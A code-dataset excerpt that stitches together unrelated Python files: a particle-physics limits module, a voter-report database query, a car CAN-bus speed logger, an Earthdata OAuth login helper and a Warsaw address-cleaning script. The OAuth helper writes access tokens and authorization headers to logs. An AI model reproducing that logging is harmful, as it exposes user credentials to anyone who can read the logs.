log_r_kin.astype(np.float64)\n log_r_kin = self._clean_nans(log_r_kin)\n logger.debug(\"Raw mean -2 log r: %s\", np.mean(-2.0 * log_r_kin, axis=1))\n log_r_kin = n_events * np.sum(log_r_kin * obs_weights[np.newaxis, :], axis=1)\n logger.debug(\"Rescaled -2 log r: %s\", -2.0 * log_r_kin)\n\n elif mode == \"histo\":\n if hist_vars is not None:\n logger.info(\"Setting up standard summary statistics\")\n summary_function = self._make_summary_statistic_function(\"observables\", observables=hist_vars)\n elif model_file is not None:\n logger.info(\"Loading score estimator and setting it up as summary statistics\")\n model = self._load_score_model(model_file)\n summary_function = self._make_summary_statistic_function(\"sally\", model=model)\n else:\n raise RuntimeError(\"For 'histo' mode, either provide histo_vars or model_file!\")\n summary_stats = summary_function(x)\n\n logger.info(\"Creating histogram with %s bins for the summary statistics\", hist_bins)\n histo = self._make_histo(summary_function, hist_bins, theta_grid, theta_resolutions)\n\n logger.info(\"Calculating kinematic log likelihood with histograms\")\n log_r_kin = self._calculate_log_likelihood_histo(summary_stats, theta_grid, histo)\n log_r_kin = log_r_kin.astype(np.float64)\n log_r_kin = self._clean_nans(log_r_kin)\n log_r_kin = n_events * np.sum(log_r_kin * obs_weights[np.newaxis, :], axis=1)\n\n else:\n raise ValueError(\"Unknown mode {}, has to be 'ml' or 'histo' or 'xsec'\".format(mode))\n\n # xsec part\n if include_xsec:\n logger.info(\"Calculating rate log likelihood\")\n log_p_xsec = self._calculate_log_likelihood_xsec(n_events, theta_grid, luminosity)\n logger.debug(\"Rate -2 log p: %s\", -2.0 * log_p_xsec)\n else:\n log_p_xsec = 0.0\n\n # Combine and get p-values\n logger.info(\"Calculating p-values\")\n log_r = log_r_kin + log_p_xsec\n logger.debug(\"Combined -2 log r: %s\", -2.0 * log_r)\n log_r, i_ml = self._subtract_ml(log_r)\n logger.debug(\"Min-subtracted -2 log r: %s\", -2.0 * log_r)\n p_values = self.asymptotic_p_value(log_r)\n\n return theta_grid, p_values, i_ml\n\n def _make_summary_statistic_function(self, mode, model=None, observables=None):\n if mode == \"observables\":\n assert observables is not None\n x_indices = self._find_x_indices(observables)\n\n def summary_function(x):\n return x[:, x_indices]\n\n elif mode == \"sally\":\n assert isinstance(model, ScoreEstimator)\n\n def summary_function(x):\n return model.evaluate_score(x)\n\n else:\n raise RuntimeError(\"Unknown mode {}, has to be 'observables' or 'sally'\".format(mode))\n\n return summary_function\n\n @staticmethod\n def _load_ratio_model(filename):\n if os.path.isdir(filename):\n model = Ensemble()\n model.load(filename)\n else:\n model = ParameterizedRatioEstimator()\n model.load(filename)\n return model\n\n @staticmethod\n def _load_score_model(filename):\n if os.path.isdir(filename):\n model = Ensemble()\n model.load(filename)\n else:\n model = ScoreEstimator()\n model.load(filename)\n return model\n\n def _calculate_xsecs(self, thetas, test_split=0.2):\n # Test split\n start_event, end_event = self._train_test_split(False, test_split)\n\n # Total xsecs for benchmarks\n xsecs_benchmarks = 0.0\n for observations, weights in self.event_loader(start=start_event, end=end_event):\n xsecs_benchmarks += np.sum(weights, axis=0)\n\n # xsecs at thetas\n xsecs = []\n for theta in thetas:\n theta_matrix = self._get_theta_benchmark_matrix(theta)\n xsecs.append(mdot(theta_matrix, xsecs_benchmarks))\n return np.asarray(xsecs)\n\n def _asimov_data(self, theta, test_split=0.2):\n start_event, end_event = self._train_test_split(False, test_split)\n x, weights_benchmarks = next(self.event_loader(start=start_event, end=end_event, batch_size=None))\n\n theta_matrix = self._get_theta_benchmark_matrix(theta)\n weights_theta = mdot(theta_matrix, weights_benchmarks)\n weights_theta /= np.sum(weights_theta)\n\n return x, weights_theta\n\n @staticmethod\n def _make_theta_grid(theta_ranges, resolutions):\n if isinstance(resolutions, int):\n resolutions = [resolutions for _ in range(theta_ranges)]\n theta_each = []\n for resolution, (theta_min, theta_max) in zip(resolutions, theta_ranges):\n theta_each.append(np.linspace(theta_min, theta_max, resolution))\n theta_grid_each = np.meshgrid(*theta_each)\n theta_grid_each = [theta.flatten() for theta in theta_grid_each]\n theta_grid = np.vstack(theta_grid_each).T\n return theta_grid\n\n def _make_histo(self, summary_function, x_bins, theta_grid, theta_bins, n_samples_per_theta=1000):\n logger.info(\"Building histogram with %s bins per parameter and %s bins per observable\")\n histo = Histo(theta_bins, x_bins)\n theta, x = self._make_histo_data(theta_grid, n_samples_per_theta * len(theta_grid))\n summary_stats = summary_function(x)\n histo.fit(theta, summary_stats, fill_empty_bins=True)\n return histo\n\n def _make_histo_data(self, thetas, n_samples, test_split=0.2):\n sampler = SampleAugmenter(self.madminer_filename, include_nuisance_parameters=self.include_nuisance_parameters)\n x, theta, _ = sampler.sample_train_plain(\n theta=sampling.morphing_points(thetas),\n n_samples=n_samples,\n test_split=test_split,\n filename=None,\n folder=None,\n )\n return theta, x\n\n def _find_x_indices(self, observables):\n x_names = list(self.observables.keys())\n x_indices = []\n for obs in observables:\n try:\n x_indices.append(x_names.index(obs))\n except ValueError:\n raise RuntimeError(\"Unknown observable {}, has to be one of {}\".format(obs, x_names))\n logger.debug(\"Using x indices %s\", x_indices)\n return x_indices\n\n @staticmethod\n def _calculate_log_likelihood_histo(x, theta_grid, histo):\n log_p = []\n for theta in theta_grid:\n log_p.append(histo.log_likelihood(theta, x))\n log_p = np.asarray(log_p)\n return log_p\n\n def _calculate_log_likelihood_xsec(self, n_observed, theta_grid, luminosity=300000.0):\n n_observed_rounded = int(np.round(n_observed, 0))\n n_predicted = self._calculate_xsecs(theta_grid) * luminosity\n logger.debug(\"Observed events: %s\", n_observed)\n logger.debug(\"Expected events: %s\", n_predicted)\n log_p = poisson.logpmf(k=n_observed_rounded, mu=n_predicted)\n return log_p\n\n def _calculate_log_likelihood_ratio_kinematics(self, x_observed, theta_grid, model, theta1=None):\n if isinstance(model, ParameterizedRatioEstimator):\n log_r, _ = model.evaluate_log_likelihood_ratio(\n x=x_observed, theta=theta_grid, test_all_combinations=True, evaluate_score=False\n )\n elif isinstance(model, Ensemble) and model.estimator_type == \"parameterized_ratio\":\n log_r, _ = model.evaluate_log_likelihood_ratio(\n x=x_observed,\n theta=theta_grid,\n test_all_combinations=True,\n evaluate_score=False,\n calculate_covariance=False,\n )\n else:\n raise NotImplementedError(\n \"Likelihood ratio estimation is currently only implemented for \"\n \"ParameterizedRatioEstimator instancees\"\n )\n return log_r\n\n @staticmethod\n def _subtract_ml(log_r):\n i_ml = np.argmax(log_r)\n log_r_subtracted = log_r[:] - log_r[i_ml]\n return log_r_subtracted, i_ml\n\n @staticmethod\n def _clean_nans(array):\n not_finite = np.any(~np.isfinite(array), axis=0)\n if np.sum(not_finite) > 0:\n logger.warning(\"Removing %s inf / nan results from calculation\")\n array[:, not_finite] = 0.0\n return array\n\n def _train_test_split(self, train, test_split):\n \"\"\"\n Returns the start and end event for train samples (train = True) or test samples (train = False).\n\n Parameters\n ----------\n train : bool\n True if training data is generated, False if test data is generated.\n\n test_split : float\n Fraction of events reserved for testing.\n\n Returns\n -------\n start_event : int\n Index of the first unweighted event to consider.\n\n end_event : int\n Index of the last unweighted event to consider.\n\n \"\"\"\n if train:\n start_event = 0\n\n if test_split is None or test_split <= 0.0 or test_split >= 1.0:\n end_event = None\n else:\n end_event = int(round((1.0 - test_split) * self.n_samples, 0))\n if end_event < 0 or end_event > self.n_samples:\n raise ValueError(\"Irregular train / test split: sample {} / {}\", end_event, self.n_samples)\n\n else:\n if test_split is None or test_split <= 0.0 or test_split >= 1.0:\n start_event = 0\n else:\n start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1\n if start_event < 0 or start_event > self.n_samples:\n raise ValueError(\"Irregular train / test split: sample {} / {}\", start_event, self.n_samples)\n\n end_event = None\n\n return start_event, end_event\n","sub_path":"madminer/limits.py","file_name":"limits.py","file_ext":"py","file_size_in_byte":13890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405409171","text":"import json\n\ndef getReportGeneralbyLeader(mysql):\n try:\n response = {}\n cur = mysql.connection.cursor()\n cur.execute(\"\"\"SELECT V.id_voter, CONCAT(V.names, ' ',V.last_names), V.document, V.phone, V.address_show, C.city, V.voting_table, CONCAT(L.names, ' ',L.last_names)\n FROM voters as V INNER JOIN citys as C ON V.id_city = C.id_city INNER JOIN users as L ON V.id_leader = L.id_user\n \"\"\")\n data = cur.fetchall()\n if cur.rowcount > 0:\n result = {}\n cant = 0\n for row in data:\n print (row)\n result[row[0]] = { \"id_voter\":row[0], \"name_voter\": row[1], \"document\": row[2], \"phone\": row[3], \"address_show\": row[4], \"city\": row[5], \"voting_table\": row[6], \"name_leader\": row[7] }\n cant = cant+1\n\n response[\"code\"] = 200\n response[\"data\"][\"quantity\"] = cant\n response[\"data\"] = json.dumps(result)\n else:\n response[\"code\"] = 204\n cur.close()\n return response\n except:\n print(\"Error getGeneralbyLeader\")\n return ({\"code\":409})\n\n# def getCitybyId(mysql,id_city):\n# try:\n# response = {}\n# cur = mysql.connection.cursor()\n# sql = \"SELECT id_city, city FROM citys WHERE id_city = %s\"\n# cur.execute(sql, (id_city,))\n# data = cur.fetchall()\n# if cur.rowcount > 0:\n# result = {}\n# for row in data:\n# print (row)\n# result[row[0]] = { \"id_city\":row[0], \"city\": row[1] }\n\n# response[\"code\"] = 200\n# response[\"data\"] = json.dumps(result)\n# else:\n# response[\"code\"] = 204\n# print(response)\n# cur.close()\n# return response\n# except:\n# print(\"Error getCitybyId\")\n# return ({\"code\":409})\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555674063","text":"#\n# Speed logger - PriusCAN\n# AVT ADAS & Autonomy Team, Fall 2019\n#\n\nfrom common.corebus.corebus import CoreBus\nfrom common.utils.debugprint import DebugPrint as dp\nfrom common.can.interface import CANInterface as cif\n\n# Initialize app and CoreBus:\ndp.debugPrint(\"Wheel speed logger\", \"init\")\nappCoreBus = CoreBus().connection\n\n# Set CAN interface socket and DBC filename here:`\ncanInterface = cif(\"can0\", \"toyota_prius.dbc\")\nsock = canInterface.sock\n\n# Primary loop\nwhile(True):\n\n # Keep on listening for CAN packets:\n packet = sock.recv(72)\n\n # Try to decode wheel speed\n wheelSpeedDecoded = canInterface.decode(packet = packet, filter_id_hex = \"0x0aa\")\n if(wheelSpeedDecoded != False):\n # Individual wheel speeds\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.front.right\", float(wheelSpeedDecoded[\"WHEEL_SPEED_FR\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.front.left\", float(wheelSpeedDecoded[\"WHEEL_SPEED_FL\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.rear.right\", float(wheelSpeedDecoded[\"WHEEL_SPEED_RR\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.rear.left\", float(wheelSpeedDecoded[\"WHEEL_SPEED_RL\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.updated\", canInterface.getCurrentTimestamp())\n\n # Try to decode composite speed\n speedDecoded = canInterface.decode(packet = packet, filter_id_hex = \"0x0b4\")\n if(speedDecoded != False):\n # Individual wheel speeds\n appCoreBus.set(\"vehicle.core.sensor.speed\", float(speedDecoded[\"SPEED\"]))\n appCoreBus.set(\"vehicle.core.sensor.speed.updated\", speedDecoded.getCurrentTimestamp())\n","sub_path":"speed.py","file_name":"speed.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135331928","text":"\nimport logging\nimport os\nimport re\nimport urllib\nfrom time import time\nfrom json import loads\n\nfrom .view_util import make_set_cookie_headers_jwt, get_exp_time, JWT_COOKIE_NAME\nfrom .aws_util import retrieve_secret\n\n\nlog = logging.getLogger(__name__)\n\n\ndef get_base_url(ctxt=False):\n # Make a redirect url using optional custom domain_name, otherwise use raw domain/stage provided by API Gateway.\n try:\n return 'https://{}/'.format(\n os.getenv('DOMAIN_NAME', '{}/{}'.format(ctxt['domainName'], ctxt['stage'])))\n except (TypeError, IndexError) as e:\n log.error('could not create a redirect_url, because {}'.format(e))\n raise\n\n\ndef get_redirect_url(ctxt=False):\n return '{}login'.format(get_base_url(ctxt))\n\n\ndef do_auth(code, redirect_url):\n\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/oauth/token\"\n\n # App U:P from URS Application\n auth = get_urs_creds()['UrsAuth']\n\n post_data = {\"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": redirect_url}\n\n headers = {\"Authorization\": \"BASIC \" + auth}\n post_data_encoded = urllib.parse.urlencode(post_data).encode(\"utf-8\")\n post_request = urllib.request.Request(url, post_data_encoded, headers)\n\n t0 = time()\n try:\n log.debug('headers: {}'.format(headers))\n log.debug('url: {}'.format(url))\n log.debug('post_data: {}'.format(post_data))\n\n response = urllib.request.urlopen(post_request) #nosec URL is *always* URS.\n t1 = time()\n packet = response.read()\n log.debug('ET to do_auth() urlopen(): {} sec'.format(t1 - t0))\n log.debug('ET to do_auth() request to URS: {} sec'.format(time() - t0))\n return loads(packet)\n\n except urllib.error.URLError as e:\n log.error(\"Error fetching auth: {0}\".format(e))\n log.debug('ET for the attempt: {}'.format(format(round(time() - t0, 4))))\n return {}\n\n\ndef get_urs_url(ctxt, to=False):\n\n base_url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + '/oauth/authorize'\n\n # From URS Application\n client_id = get_urs_creds()['UrsId']\n\n log.debug('domain name: %s' % os.getenv('DOMAIN_NAME', 'no domainname set'))\n log.debug('if no domain name set: {}.execute-api.{}.amazonaws.com/{}'.format(ctxt['apiId'], os.getenv('AWS_DEFAULT_REGION', ''), ctxt['stage']))\n\n urs_url = '{0}?client_id={1}&response_type=code&redirect_uri={2}'.format(base_url, client_id, get_redirect_url(ctxt))\n if to:\n urs_url += \"&state={0}\".format(to)\n\n # Try to handle scripts\n agent_pattern = re.compile('^(curl|wget|aria2|python)', re.IGNORECASE)\n\n try:\n download_agent = ctxt['identity']['userAgent']\n except IndexError:\n log.debug(\"No User Agent!\")\n return urs_url\n\n if agent_pattern.match(download_agent):\n urs_url += \"&app_type=401\"\n\n return urs_url\n\n\ndef get_profile(user_id, token, temptoken=False):\n if not user_id or not token:\n return {}\n\n # get_new_token_and_profile() will pass this function a temporary token with which to fetch the profile info. We\n # don't want to keep it around, just use it here, once:\n if temptoken:\n headertoken = temptoken\n else:\n headertoken = token\n\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/api/users/{0}\".format(user_id)\n headers = {\"Authorization\": \"Bearer \" + headertoken}\n req = urllib.request.Request(url, None, headers)\n\n try:\n\n response = urllib.request.urlopen(req) # nosec URL is *always* URS.\n packet = response.read()\n\n user_profile = loads(packet)\n\n return user_profile\n\n except urllib.error.URLError as e:\n log.warning(\"Error fetching profile: {0}\".format(e))\n if not temptoken: # This keeps get_new_token_and_profile() from calling this over and over\n log.debug('because error above, going to get_new_token_and_profile()')\n return get_new_token_and_profile(user_id, token)\n else:\n log.debug('We got that 401 above and we\\'re using a temptoken ({}), so giving up and not getting a profile.'.format(temptoken))\n return {}\n\n\ndef get_new_token_and_profile(user_id, cookietoken):\n\n # get a new token\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/oauth/token\"\n\n # App U:P from URS Application\n auth = get_urs_creds()['UrsAuth']\n post_data = {\"grant_type\": \"client_credentials\" }\n headers = {\"Authorization\": \"BASIC \" + auth}\n\n # Download token\n post_data_encoded = urllib.parse.urlencode(post_data).encode(\"utf-8\")\n post_request = urllib.request.Request(url, post_data_encoded, headers)\n\n t0 = time()\n try:\n log.info(\"Attempting to get new Token\")\n\n response = urllib.request.urlopen(post_request) #nosec URL is *always* URS.\n t1 = time()\n packet = response.read()\n new_token = loads(packet)['access_token']\n t2 = time()\n log.info(\"Retrieved new token: {0}\".format(new_token))\n log.debug('ET for get_new_token_and_profile() urlopen() {} sec'.format(t1 - t0))\n log.debug('ET for get_new_token_and_profile() response.read() and loads() {} sec'.format(t2- t1))\n # Get user profile with new token\n return get_profile(user_id, cookietoken, new_token)\n\n except urllib.error.URLError as e:\n log.error(\"Error fetching auth: {0}\".format(e))\n log.debug('ET for the attempt: {}'.format(format(round(time() - t0, 4))))\n return False\n\n\ndef user_in_group_list(private_groups, user_groups):\n client_id = get_urs_creds()['UrsId']\n log.info(\"Searching for private groups {0} in {1}\".format(private_groups, user_groups))\n for u_g in user_groups:\n if u_g['client_id'] == client_id:\n for p_g in private_groups:\n if p_g == u_g['name']:\n # Found the matching group!\n log.info(\"User belongs to private group {}\".format(p_g))\n return True\n\n\ndef user_in_group_urs(private_groups, user_id, token, user_profile=None, refresh_first=False):\n\n new_profile = {}\n\n if refresh_first or not user_profile:\n user_profile = get_profile(user_id, token)\n new_profile = user_profile\n\n if isinstance(user_profile, dict) and 'user_groups' in user_profile and user_in_group_list(private_groups, user_profile['user_groups']):\n log.info(\"User {0} belongs to private group\".format(user_id))\n return True, new_profile\n\n else:\n # Couldn't find user in provided groups, but we may as well look at a fresh group list:\n if not refresh_first:\n # we have a maybe not so fresh user_profile and we could try again to see if someone added a group to this user:\n log.debug(\"Could not validate user {0} belonging to groups {1}, attempting profile refresh\".format(user_id, private_groups))\n\n return user_in_group_urs(private_groups, user_id, {}, refresh_first=True)\n log.debug(\"Even after profile refresh, user {0} does not belong to groups {1}\".format(user_id, private_groups))\n\n return False, new_profile\n\n\ndef user_in_group(private_groups, cookievars, user_profile=None, refresh_first=False):\n\n # If a new profile is fetched, it is assigned to this var, and returned so that a fresh jwt cookie can be set.\n new_profile = {}\n\n if not private_groups:\n return False, new_profile\n\n try:\n jwt_payload = cookievars[JWT_COOKIE_NAME]\n\n except (KeyError, IndexError) as e:\n log.error('JWT cookie not present. ')\n\n return False\n\n else:\n if refresh_first:\n new_profile = get_profile(jwt_payload['urs-user-id'], jwt_payload['urs-access-token'])\n jwt_payload['user_groups'] = new_profile['user_groups']\n # TODO: reset fresh group-membership JWT cookie now? Somehow?\n\n in_group = user_in_group_list(private_groups, jwt_payload['urs-groups'])\n if in_group:\n return True, new_profile\n elif not in_group and not refresh_first:\n # TODO: look at ['iat'] and if cookie is recent enough (how recent?), don't bother doing this.\n # one last ditch effort to see if they were so very recently added to group:\n jwt_payload['user_groups'] = get_profile(jwt_payload['urs-user-id'], jwt_payload['urs-access-token'])['user_groups']\n return user_in_group(private_groups, cookievars, {}, refresh_first=True)\n else:\n return False, new_profile\n\n\ndef get_urs_creds():\n \"\"\"\n Fetches URS creds from secrets manager.\n :return: looks like:\n {\n \"UrsId\": \"stringofseeminglyrandomcharacters\",\n \"UrsAuth\": \"verymuchlongerstringofseeminglyrandomcharacters\"\n }\n :type: dict\n \"\"\"\n secret_name = os.getenv('URS_CREDS_SECRET_NAME', None)\n\n if not secret_name:\n log.error('URS_CREDS_SECRET_NAME not set')\n return {}\n secret = retrieve_secret(secret_name)\n if not ('UrsId' in secret and 'UrsAuth' in secret):\n log.error('AWS secret {} does not contain required keys \"UrsId\" and \"UrsAuth\"'.format(secret_name))\n\n return secret\n\n\ndef user_profile_2_jwt_payload(user_id, access_token, user_profile):\n return {\n # Do we want more items in here?\n 'first_name': user_profile['first_name'],\n 'last_name': user_profile['last_name'],\n 'urs-user-id': user_id,\n 'urs-access-token': access_token,\n 'urs-groups': user_profile['user_groups'],\n 'iat': int(time()),\n 'exp': get_exp_time(),\n }\n\n\n# This do_login() is mainly for chalice clients.\ndef do_login(args, context, cookie_domain=''):\n\n log.debug('the query_params: {}'.format(args))\n\n if not args:\n template_vars = {'contentstring': 'No params', 'title': 'Could Not Login'}\n headers = {}\n return 400, template_vars, headers\n\n if args.get('error', False):\n contentstring = 'An error occurred while trying to log into URS. URS says: \"{}\". '.format(args.get('error', ''))\n if args.get('error') == 'access_denied':\n # This happens when user doesn't agree to EULA. Maybe other times too.\n return_status = 401\n contentstring += 'Be sure to agree to the EULA.'\n else:\n return_status = 400\n\n template_vars = {'contentstring': contentstring, 'title': 'Could Not Login'}\n\n return return_status, template_vars, {}\n\n if 'code' not in args:\n contentstring = 'Did not get the required CODE from URS'\n\n template_vars = {'contentstring': contentstring, 'title': 'Could not login.'}\n headers = {}\n return 400, template_vars, headers\n\n log.debug('pre-do_auth() query params: {}'.format(args))\n redir_url = get_redirect_url(context)\n auth = do_auth(args.get('code', ''), redir_url)\n log.debug('auth: {}'.format(auth))\n if not auth:\n log.debug('no auth returned from do_auth()')\n\n template_vars = {'contentstring': 'There was a problem talking to URS Login', 'title': 'Could Not Login'}\n\n return 400, template_vars, {}\n\n user_id = auth['endpoint'].split('/')[-1]\n\n user_profile = get_profile(user_id, auth['access_token'])\n log.debug('Got the user profile: {}'.format(user_profile))\n if user_profile:\n log.debug('urs-access-token: {}'.format(auth['access_token']))\n if 'state' in args:\n redirect_to = args[\"state\"]\n else:\n redirect_to = get_base_url(context)\n\n if 'user_groups' not in user_profile or not user_profile['user_groups']:\n user_profile['user_groups'] = []\n\n jwt_cookie_payload = user_profile_2_jwt_payload(user_id, auth['access_token'], user_profile)\n\n headers = {'Location': redirect_to}\n headers.update(make_set_cookie_headers_jwt(jwt_cookie_payload, '', cookie_domain))\n return 301, {}, headers\n\n template_vars = {'contentstring': 'Could not get user profile from URS', 'title': 'Could Not Login'}\n return 400, template_vars, {}\n","sub_path":"rain_api_core/urs_util.py","file_name":"urs_util.py","file_ext":"py","file_size_in_byte":12237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64083845","text":"import csv\r\nimport sys, os\r\nimport pandas as pd\r\n\r\nsys.path.append('C:/Users/OEM/data_mining/oto_dom/')\r\nimport tools.addressMatching as am\r\n\r\ndef loadRawFile(file):\r\n with open( file + \".csv\") as f:\r\n spamreader = csv.reader(f, delimiter=';', quotechar='|')\r\n lst = []\r\n col_names = []\r\n for i,row in enumerate(spamreader):\r\n if i == 0:\r\n col_names = row\r\n continue\r\n lst.append(dict(zip(col_names,row)))\r\n \r\n df = pd.DataFrame(lst)\r\n return df.set_index('id')\r\n\r\ncity = 'warszawa'\r\n\r\nmatched = loadRawFile('C:/Users/OEM/data_mining/oto_dom/utils/matched')\r\n\r\nsample = loadRawFile('C:/Users/OEM/data_mining/oto_dom/data/' + city+'_raw')\r\n\r\n#\r\nadr_match = am.AddressMatching(city)\r\nad = adr_match.loadAddresses('C:/Users/OEM/data_mining/oto_dom/utils/warszawa_addresses.csv')\r\nsample = adr_match.stripAddress(sample)\r\n\r\nam.addressStats(sample,'raw sample') \r\n\r\nsample['orig_street'] = [False if s == '.' else True for s in sample['Street']]\r\n#\r\n# Removing rows that do not have any address items\r\n#\r\nsample = sample[(sample['Borough'] != '.') | (sample['Neighbourhood'] != '.') | (sample['Street'] != '.') \\\r\n | (sample['district'] != '.') | (sample['Unknown'] != '.')]\r\n#\r\n# correcting name of boroughs/neighbourhoods/streets/\r\n#\r\nmapping = {'praga-północ':'praga północ','praga-południe':'praga południe','centrum':'śródmieście','dolny mokotów':'mokotów','górny mokotów':'mokotów'}\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Borough', mapping)\r\n\r\nmapping = {'starówka':'stare miasto','imielin':'stary imielin','stary wilanów':'wilanów wysoki','kawęczyn':'kawęczyn-wygoda' \\\r\n ,'miasteczko wilanów': 'błonia wilanowskie', }\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\nmapping = {'ken':'Komisji Edukacji Narodowej, al.'}\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'street', mapping)\r\n\r\n#\r\n# words removed from unknown\r\n#\r\nto_delete_from_address_item = ['ul.', 'al.', 'pokoje','winda kuchnia','windą kuchnią','balkon', 'mieszkanie', 'mieszkania', 'nowoczesnej', \\\r\n 'centrum','kuchnia','kuchnią','górny mokotów','dolny mokotów', 'warszawa', 'metro', 'metra', 'ulica','prowizji']\r\nfor item in to_delete_from_address_item:\r\n sample['Unknown'] = [i.replace(item,'') for i in sample['Unknown']]\r\n\r\n# \r\n# removing rows when unknown address item contains one of the phrase given\r\n#\r\n\r\nto_erase = ['mdm', 'nowa inwestycja', 'promocja', 'niska cena']\r\nfor item in to_erase:\r\n sample['Unknown'] = ['to_delete' if item in i else i for i in sample['Unknown']]\r\ntemp = sample[sample['Unknown'] == 'to_delete']\r\ndel temp\r\nsample['Unknown'] = ['.' if i == 'to_delete' else i for i in sample['Unknown']]\r\n\r\n# \r\n# removing white signs and correcting the inputs\r\n#\r\nsample['Unknown'] = [i.lstrip() for i in sample['Unknown']]\r\nsample['Unknown'] = [i.replace(' ',' ') for i in sample['Unknown']]\r\nsample['Unknown'] = ['.' if i == '' or i == ' ' else i for i in sample['Unknown'] ]\r\n\r\nam.addressStats(sample,'cleaned sample') \r\n\r\n#\r\n# filling boroughs and neighbourhoods names basing on the column district\r\n#\r\n\r\nsample['district'] = sample['district'].apply(lambda x: x.lower()) \r\n#sample = adr_match.fillBasingOnDistrict(sample, 'Neighbourhood') \r\n#sample = adr_match.fillBasingOnDistrict(sample, 'Borough')\r\n\r\n\r\ndistrict_borough_mapping = dict()\r\nfor borough in ad['Borough'].unique():\r\n district_borough_mapping[borough.lower()] = borough.lower()\r\nfor borough, neighbourhood in zip(ad['Borough'],ad['Neighbourhood']):\r\n district_borough_mapping[neighbourhood.lower()] = borough.lower() \r\n\r\ndistrict_borough_mapping['.'] = '.'\r\ndistrict_borough_mapping['annopol'] = 'białołęka'\r\ndistrict_borough_mapping['augustów'] = 'białołęka'\r\ndistrict_borough_mapping['białołęka dworska'] = 'białołęka'\r\ndistrict_borough_mapping['buraków'] = 'bielany'\r\ndistrict_borough_mapping['centrum'] ='śródmieście'\r\ndistrict_borough_mapping['dolny mokotów'] = 'mokotów'\r\ndistrict_borough_mapping['górny mokotów'] ='mokotów'\r\ndistrict_borough_mapping['imielin'] = 'ursynów'\r\ndistrict_borough_mapping['jelonki'] = 'bemowo'\r\ndistrict_borough_mapping['kawęczyn'] = 'rembertów'\r\ndistrict_borough_mapping['kąty grodziskie'] = 'białołęka'\r\ndistrict_borough_mapping['kępa gocławska'] = 'praga południe'\r\ndistrict_borough_mapping['kępa tarchomińska'] = 'białołęka'\r\ndistrict_borough_mapping['królikarnia'] = 'mokotów'\r\ndistrict_borough_mapping['latawiec'] = 'śródmieście'\r\ndistrict_borough_mapping['lewandów'] = 'białołęka'\r\ndistrict_borough_mapping['mariensztat'] = 'śródmieście'\r\ndistrict_borough_mapping['marymont'] = 'bielany'\r\ndistrict_borough_mapping['metro wilanowska'] = 'mokotów'\r\ndistrict_borough_mapping['moczydło'] = 'wola'\r\ndistrict_borough_mapping['nadwilanówka'] = 'wilanów'\r\ndistrict_borough_mapping['nowe bródno'] = 'targówek'\r\ndistrict_borough_mapping['nowe górce'] = 'bemowo'\r\ndistrict_borough_mapping['nowy służewiec'] = 'ursynów'\r\ndistrict_borough_mapping['pola mokotowskie'] = 'mokotów'\r\ndistrict_borough_mapping['praga-południe'] = 'praga południe'\r\ndistrict_borough_mapping['praga-północ'] = 'praga północ'\r\ndistrict_borough_mapping['praga'] = 'praga południe'\r\ndistrict_borough_mapping['przyczółek grochowski'] = 'praga południe'\r\ndistrict_borough_mapping['stokłosy'] = 'ursynów'\r\ndistrict_borough_mapping['witolin'] = 'praga południe'\r\ndistrict_borough_mapping['zielona'] = 'wesoła'\r\n\r\nsample = adr_match.applyMapping(sample, 'district', 'Borough', district_borough_mapping,False)\r\n\r\n#for item in sample['district'].unique():\r\n# if not item in district_borough_mapping.keys():\r\n# print(item)\r\n\r\ndistrict_neighbourhood_mapping = dict()\r\nfor borough, neighbourhood in zip(ad['Borough'],ad['Neighbourhood']):\r\n district_neighbourhood_mapping[neighbourhood.lower()] = borough.lower() \r\nfor borough in ad['Borough'].unique():\r\n district_neighbourhood_mapping[borough.lower()] ='.'\r\n\r\ndistrict_neighbourhood_mapping['dolny mokotów'] = '.'\r\ndistrict_neighbourhood_mapping['górny mokotów'] = '.'\r\ndistrict_neighbourhood_mapping['praga'] = '.'\r\ndistrict_neighbourhood_mapping['praga-południe'] = '.'\r\ndistrict_neighbourhood_mapping['praga-północ'] = '.'\r\n\r\ndistrict_neighbourhood_mapping['.'] = '.'\r\ndistrict_neighbourhood_mapping['annopol'] = 'żerań' \r\ndistrict_neighbourhood_mapping['augustów'] = 'grodzisk'\r\ndistrict_neighbourhood_mapping['białołęka dworska'] = 'dworska'\r\ndistrict_neighbourhood_mapping['buraków'] = 'młociny' \r\ndistrict_neighbourhood_mapping['centrum'] = 'śródmieście północne'\r\ndistrict_neighbourhood_mapping['imielin'] = 'stary imielin'\r\ndistrict_neighbourhood_mapping['jelonki'] = 'jelonki północne'\r\ndistrict_neighbourhood_mapping['kawęczyn'] = 'kawęczyn-wygoda'\r\ndistrict_neighbourhood_mapping['kąty grodziskie'] = 'grodzisk'\r\ndistrict_neighbourhood_mapping['kępa gocławska'] = 'gocław' \r\ndistrict_neighbourhood_mapping['kępa tarchomińska'] = 'nowodwory'\r\ndistrict_neighbourhood_mapping['królikarnia'] = 'ksawerów'\r\ndistrict_neighbourhood_mapping['latawiec'] = 'śródmieście południowe'\r\ndistrict_neighbourhood_mapping['lewandów'] = 'grodzisk'\r\ndistrict_neighbourhood_mapping['mariensztat'] = 'powiśle'\r\ndistrict_neighbourhood_mapping['marymont'] = 'marymont-kaskada'\r\ndistrict_neighbourhood_mapping['metro wilanowska'] = 